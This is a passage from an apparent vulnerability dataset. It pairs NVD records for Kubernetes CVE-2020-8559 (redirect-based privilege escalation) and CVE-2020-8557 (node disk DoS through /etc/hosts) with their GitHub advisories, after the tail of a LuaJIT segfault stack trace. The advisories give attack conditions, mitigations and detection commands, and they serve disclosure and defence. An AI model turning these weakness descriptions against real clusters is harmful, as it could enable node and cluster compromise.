/home/yongheng/LuaJit_asan/src/lj_gc.c:511:13 #16 0x54b3da in gc_finalize /home/yongheng/LuaJit_asan/src/lj_gc.c:558:5 #17 0x54d241 in gc_onestep /home/yongheng/LuaJit_asan/src/lj_gc.c:696:7 #18 0x54e727 in lj_gc_fullgc /home/yongheng/LuaJit_asan/src/lj_gc.c:786:8 #19 0x4f463c in lua_gc /home/yongheng/LuaJit_asan/src/lj_api.c:1256:5 #20 0x611571 in lj_cf_collectgarbage /home/yongheng/LuaJit_asan/src/lib_base.c:455:15 #21 0x5487b4 in lj_BC_FUNCC (/home/yongheng/LuaJit_asan/src/luajit+0x5487b4) #22 0x611efc in reader_func /home/yongheng/LuaJit_asan/src/lib_base.c:390:3 #23 0x4f9fa3 in lex_more /home/yongheng/LuaJit_asan/src/lj_lex.c:49:19 #24 0x4f5580 in lex_next /home/yongheng/LuaJit_asan/src/lj_lex.c:65:65 #25 0x4f5580 in lj_lex_setup /home/yongheng/LuaJit_asan/src/lj_lex.c:418:3 #26 0x522a4e in cpparser /home/yongheng/LuaJit_asan/src/lj_load.c:36:8 #27 0x548baa in lj_vm_cpcall (/home/yongheng/LuaJit_asan/src/luajit+0x548baa) #28 0x5228dc in lua_loadx /home/yongheng/LuaJit_asan/src/lj_load.c:58:12 #29 0x6110c0 in lj_cf_load /home/yongheng/LuaJit_asan/src/lib_base.c:417:14 #30 0x5487b4 in lj_BC_FUNCC (/home/yongheng/LuaJit_asan/src/luajit+0x5487b4) #31 0x54ba14 in gc_call_finalizer /home/yongheng/LuaJit_asan/src/lj_gc.c:511:13 #32 0x54b3da in gc_finalize /home/yongheng/LuaJit_asan/src/lj_gc.c:558:5 #33 0x54d241 in gc_onestep /home/yongheng/LuaJit_asan/src/lj_gc.c:696:7 #34 0x54c367 in lj_gc_step /home/yongheng/LuaJit_asan/src/lj_gc.c:726:20 #35 0x4eddaf in lua_newuserdata /home/yongheng/LuaJit_asan/src/lj_api.c:759:3 #36 0x611669 in lj_cf_newproxy /home/yongheng/LuaJit_asan/src/lib_base.c:471:3 #37 0x5487b4 in lj_BC_FUNCC (/home/yongheng/LuaJit_asan/src/luajit+0x5487b4) #38 0x4f3426 in lua_pcall /home/yongheng/LuaJit_asan/src/lj_api.c:1140:12 #39 0x4c60f4 in docall /home/yongheng/LuaJit_asan/src/luajit.c:121:12 #40 0x4c5790 in handle_script /home/yongheng/LuaJit_asan/src/luajit.c:292:14 #41 0x4c5790 in pmain /home/yongheng/LuaJit_asan/src/luajit.c:553:17 #42 0x5487b4 in lj_BC_FUNCC (/home/yongheng/LuaJit_asan/src/luajit+0x5487b4) #43 0x4f350e in lua_cpcall /home/yongheng/LuaJit_asan/src/lj_api.c:1165:12 #44 0x4c4ab1 in main /home/yongheng/LuaJit_asan/src/luajit.c:582:12 #45 0x7fe86f40e82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #46 0x41d4c8 in _start (/home/yongheng/LuaJit_asan/src/luajit+0x41d4c8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/yongheng/LuaJit_asan/src/lj_err.c:607:10 in lj_err_run ```
Segmentation fault in lj_err_run
https://api.github.com/repos/LuaJIT/LuaJIT/issues/601/comments
4
2020-07-10T23:37:23Z
2020-08-18T10:02:13Z
https://github.com/LuaJIT/LuaJIT/issues/601
655,086,702
601
1,353
CVE-2020-8559
2020-07-22T14:15:16.517
The Kubernetes kube-apiserver in versions v1.6-v1.15, and versions prior to v1.16.13, v1.17.9 and v1.18.6 are vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.5, "impactScore": 5.9, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/92914" }, { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://groups.google.com/d/msg/kubernetes-security-announce/JAIGG5yNROs/19nHQ5wkBwAJ" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200810-0004/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/92914" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://groups.google.com/d/msg/kubernetes-security-announce/JAIGG5yNROs/19nHQ5wkBwAJ" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200810-0004/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "43222A9D-6D48-490F-8120-349DCE1C1218", "versionEndExcluding": null, "versionEndIncluding": "1.15.0", "versionStartExcluding": null, "versionStartIncluding": "1.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE1EA8C5-2EF4-4462-B693-FE20B3DF75C6", "versionEndExcluding": "1.16.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "CC1FA454-87A3-480C-BB5E-A23086E2EA99", "versionEndExcluding": "1.17.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E4009BA-8220-4B8E-8B4B-1ADA1680DD70", "versionEndExcluding": "1.18.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/kubernetes/kubernetes/issues/92914
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: Medium (6.4) [CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H) If an attacker is able to intercept certain requests to the Kubelet, they can send a redirect response that may be followed by a client using the credentials from the original request. This can lead to compromise of other nodes. If multiple clusters share the same certificate authority trusted by the client, and the same authentication credentials, this vulnerability may allow an attacker to redirect the client to another cluster. In this configuration, this vulnerability should be considered **High** severity. ### Am I vulnerable? You are only affected by this vulnerability if you treat the node as a security boundary, or if clusters share certificate authorities and authentication credentials. Note that this vulnerability requires an attacker to first compromise a node through separate means. #### Affected Versions - kube-apiserver v1.18.0-1.18.5 - kube-apiserver v1.17.0-1.17.8 - kube-apiserver v1.16.0-1.16.12 - all kube-apiserver versions prior to v1.16.0 ### How do I mitigate this vulnerability? To mitigate this vulnerability you must upgrade the kube-apiserver to a patched version. #### Fixed Versions - kube-apiserver master - fixed by https://github.com/kubernetes/kubernetes/pull/92941 - kube-apiserver v1.18.6 - fixed by https://github.com/kubernetes/kubernetes/pull/92969 - kube-apiserver v1.17.9 - fixed by https://github.com/kubernetes/kubernetes/pull/92970 - kube-apiserver v1.16.13 - fixed by https://github.com/kubernetes/kubernetes/pull/92971 **Fix impact:** Proxied backends (such as an extension API server) that respond to upgrade requests with a non-101 response code may be broken by this patch. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Detection Upgrade requests should never respond with a redirect. If any of the following requests have a response code in the 300-399 range, it may be evidence of exploitation. This information can be found in the Kubernetes audit logs. - pods/exec - pods/attach - pods/portforward - any resource: proxy If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was reported by Wouter ter Maat of Offensi, via the Kubernetes bug bounty. /area security /kind bug /committee product-security /sig api-machinery /area apiserver
CVE-2020-8559: Privilege escalation from compromised node to cluster
https://api.github.com/repos/kubernetes/kubernetes/issues/92914/comments
7
2020-07-08T17:03:16Z
2021-12-02T22:54:32Z
https://github.com/kubernetes/kubernetes/issues/92914
653,456,402
92,914
1,354
CVE-2020-8557
2020-07-23T17:15:12.513
The Kubernetes kubelet component in versions 1.1-1.16.12, 1.17.0-1.17.8 and 1.18.0-1.18.5 do not account for disk usage by a pod which writes to its own /etc/hosts file. The /etc/hosts file mounted in a pod by kubelet is not included by the kubelet eviction manager when calculating ephemeral storage usage by a pod. If a pod writes a large amount of data to the /etc/hosts file, it could fill the storage space of the node and cause the node to fail.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/93032" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/cB_JUsYEKyY/m/vVSO61AhBwAJ" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200821-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/93032" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/cB_JUsYEKyY/m/vVSO61AhBwAJ" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200821-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "12849C27-DD8A-4D84-92FD-3AB32B43742B", "versionEndExcluding": "1.16.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "CC1FA454-87A3-480C-BB5E-A23086E2EA99", "versionEndExcluding": "1.17.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E4009BA-8220-4B8E-8B4B-1ADA1680DD70", "versionEndExcluding": "1.18.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/kubernetes/kubernetes/issues/93032
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: Medium (5.5)  [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/CR:H/IR:H/AR:M](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/CR:H/IR:H/AR:M) The `/etc/hosts` file mounted in a pod by kubelet is not included by the kubelet eviction manager when calculating ephemeral storage usage by a pod. If a pod writes a large amount of data to the `/etc/hosts` file, it could fill the storage space of the node and cause the node to fail. ### Am I vulnerable? Any clusters allowing pods with sufficient privileges to write to their own `/etc/hosts` files are affected. This includes containers running with `CAP_DAC_OVERRIDE` in their capabilities bounding set (true by default) and either UID 0 (root) or a security context with `allowPrivilegeEscalation: true` (true by default). #### Affected Versions - kubelet v1.18.0-1.18.5 - kubelet v1.17.0-1.17.8 - kubelet < v1.16.13 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by using PodSecurityPolicies or other admission webhooks to force containers to drop CAP_DAC_OVERRIDE or to prohibit privilege escalation and running as root, but these measures may break existing workloads that rely upon these privileges to function properly. #### Fixed Versions - kubelet master - fixed by #92916 - kubelet v1.18.6 - fixed by #92921 - kubelet v1.17.9 - fixed by #92923 - kubelet v1.16.13 - fixed by #92924 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Detection Large pod `etc-hosts` files may indicate that a pod is attempting to perform a Denial of Service attack using this bug. A command such as ``` find /var/lib/kubelet/pods/*/etc-hosts -size +1M ``` run on a node can be used to find abnormally large pod etc-hosts files. #### Acknowledgements This vulnerability was reported by Kebe Liu of DaoCloud, via the Kubernetes bug bounty program. /area security /kind bug /committee product-security /sig node /area kubelet
CVE-2020-8557: Node disk DOS by writing to container /etc/hosts
https://api.github.com/repos/kubernetes/kubernetes/issues/93032/comments
4
2020-07-13T18:39:08Z
2024-08-29T11:57:32Z
https://github.com/kubernetes/kubernetes/issues/93032
656,058,152
93,032
1,355